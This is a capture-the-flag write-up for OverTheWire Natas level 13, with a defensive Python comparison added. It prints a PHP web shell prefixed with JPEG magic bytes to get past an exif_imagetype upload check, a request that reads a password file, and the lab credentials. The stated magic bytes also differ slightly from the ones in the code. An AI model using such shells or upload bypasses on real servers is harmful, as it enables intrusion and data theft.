Natas · OverTheWire

Natas Level 13 → Level 14

Level 13

Username : natas13
Password : jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
URL : http://natas13.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas13 application using the credentials provided above.
The application looks very similar to the one in the previous level; however, this time it checks the file type with PHP's exif_imagetype function. According to the PHP manual, exif_imagetype determines the type of an image by reading the first bytes of the file and checking its signature.
Because the function relies only on those first bytes, if we create a file that begins with the same 'magic numbers' the function expects, we should be able to bypass the check. A quick Wikipedia search yields 0xFF 0xD8 0xFF 0xE8 as the JPEG magic. Therefore, we create a new PHP file with the magic numbers at the beginning. I used Python to create the following shell file; apart from the first 4 bytes, the rest of the file is exactly the same as before.

>>> shell = open('shell.php', 'wb')  # binary mode so the magic bytes are written raw, not UTF-8 encoded
>>> shell.write(b'\xFF\xD8\xFF\xE0' + b'<?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?>')
>>> shell.close()

Once again, we upload this PHP file, intercepting the request in Burp and changing the file name so that it carries a .php extension. Navigate to the URL generated by the application, append '?cmd=cat%20/etc/natas_webpass/natas14', and the application prints the password for the next level.
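The level shows why a signature-only check is not a file-type check. The following added example (not part of this writeup or of the Natas application) mimics the weak pattern in Python and puts a hardened version beside it: the stored extension is derived by the server from the sniffed type, must agree with the client's extension, and the file name is random. The signature table and the helper names are my own.

```python
import os
import secrets

# Leading-byte signatures that a check like PHP's exif_imagetype keys on.
# Standard JPEG/PNG/GIF prefixes (assumed set, not taken from the Natas code).
SIGNATURES = {
    b"\xFF\xD8\xFF": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff_image_type(data: bytes):
    """Signature-only sniff: return an extension for a known magic, else None."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def naive_accepts(client_filename: str, data: bytes) -> bool:
    """The weak pattern: only the magic is checked, the client picks the name.
    A file that starts with JPEG bytes and continues with script text passes."""
    return sniff_image_type(data) is not None


def hardened_store_name(client_filename: str, data: bytes):
    """Return a server-chosen file name, or None to reject the upload.

    The extension the file is stored under comes from the sniffed type,
    never from the client; the client's extension must agree with it,
    and the base name is random so nothing about the request is reused.
    Store the result outside the web root and serve it with a fixed
    image Content-Type so that the contents are never interpreted."""
    kind = sniff_image_type(data)
    if kind is None:
        return None
    client_ext = os.path.splitext(client_filename)[1].lower().lstrip(".")
    if client_ext == "jpeg":
        client_ext = "jpg"
    if client_ext != kind:
        return None  # e.g. "shell.php" carrying JPEG magic bytes
    return f"{secrets.token_hex(16)}.{kind}"
```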


Level 14

Username : natas14
Password : Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
URL : http://natas14.natas.labs.overthewire.org
